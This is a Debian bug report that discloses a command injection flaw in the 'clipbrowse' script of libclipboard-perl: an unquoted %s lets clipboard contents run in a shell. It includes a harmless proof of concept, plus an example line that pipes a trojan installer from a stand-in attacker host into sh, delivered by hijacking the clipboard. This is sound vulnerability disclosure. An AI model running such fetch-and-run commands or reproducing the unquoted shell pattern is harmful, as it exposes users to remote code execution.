Bug#1060060: libclipboard-perl: 'clipbrowse' from Debian package libclipboard-perl executing clipboard contents
Sebastiaan Giebels
spam_debian_reportbug at pcprobleemloos.nl
Fri Jan 5 12:25:54 GMT 2024
Package: libclipboard-perl
Version: 0.27-1
Severity: important
Dear Maintainer,
I was checking out the 'clipbrowse' command from the Debian package
libclipboard-perl, while at the same time I was making notes on installation
instructions for a different application, thereby having multiple lines in the
clipboard buffer, including a line in the format "curl ... | sh"
I ran the 'clipbrowse' command, not knowing the command usage exactly and
expecting both an error and syntax example.
* What was the outcome of this action?
It opened a browser with the URL on the clipboard in the foreground (expected),
and simultaneously starting the installation process for the application in the
now hidden terminal/console. (not expected).
* What outcome did you expect instead?
I did not expect the clipbrowse command to run clipboard contents in a shell.
Example: Copy the following 2 lines present into the clipboard, then run the
'clipbrowse' command:
https://www.example.com
echo echo p0wned | sh
This results in the browser opening the requested URL in the foreground, while
simultaneous running the specified command in the background.
Testen on Debian 12, Perl 5.36.0-7+deb12u1, libclipboard-perl 0.27-1
This example might just print 'p0wned', but because you are copying this piece
of text using a browser that understands JavaScript, and JavaScript can modify
the clipboard contents, I could just as well have you execute "curl
https://evilhacker.example.com/install_trojan.sh | sh" by changing the
clipboard contents on an OnClipboard-event.
This could be abused by including the 'clipbrowse' command as an instruction in
an online tutorial, while having modified the users clipboard contents using
JavaScript.
I've raised the issue at the authors GitHub page (
https://github.com/shlomif/Clipboard/issues/11 ), but only today I've noticed
that that the vulnerability might be with just the Debian package, not the
source package.
I believe the cause of this is by not enclosing a variable with doublequotes:
The original sourcecode (
https://github.com/shlomif/Clipboard/blob/master/scripts/clipbrowse ) has
doublequotes around the variable %s
my $browser = $ENV{BROWSER} || 'chromium-browser "%s"';
And performs some string sanitizing in other lines.
The Debian version does not have these quotes, making the string sanitizing
ineffective:
'/usr/bin/clipbrowse' contains the following line:
my $browser = $ENV{BROWSER} || 'sensible-browser %s';
I have not checked if other packages that have been changed to use sensible-
browser have the same issue.
-- System Information:
Debian Release: 12.4
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable-security'), (500, 'unstable'), (500, 'stable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 6.1.0-14-amd64 (SMP w/4 CPU threads; PREEMPT)
Kernel taint flags: TAINT_PROPRIETARY_MODULE, TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE=en_US:en
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages libclipboard-perl depends on:
ii perl 5.36.0-7+deb12u1
ii xclip 0.13-2
Versions of packages libclipboard-perl recommends:
ii libcgi-pm-perl 4.55-1
ii liburi-perl 5.17-1
ii sensible-utils 0.0.17+nmu1
libclipboard-perl suggests no packages.
-- no debconf information
More information about the pkg-perl-maintainers
mailing list